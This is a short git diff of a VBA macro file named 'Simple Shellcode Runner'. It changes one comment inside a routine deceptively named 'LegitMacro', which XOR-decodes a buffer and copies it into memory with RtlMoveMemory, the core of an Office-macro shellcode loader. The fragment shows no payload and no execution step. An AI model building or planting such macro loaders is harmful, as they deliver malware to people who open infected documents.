diff --git a/Simple Shellcode Runner/Simple Shellcode Runner.vba b/Simple Shellcode Runner/Simple Shellcode Runner.vba index 3d66a9a..e5a6e82 100644 --- a/Simple Shellcode Runner/Simple Shellcode Runner.vba +++ b/Simple Shellcode Runner/Simple Shellcode Runner.vba @@ -50,7 +50,7 @@ Sub LegitMacro() buf(i) = buf(i) Xor 250 Next i - ' Execute the shellcode + ' Move the shellcode For counter = LBound(buf) To UBound(buf) data = buf(counter) res = RtlMoveMemory(addr + counter, data, 1)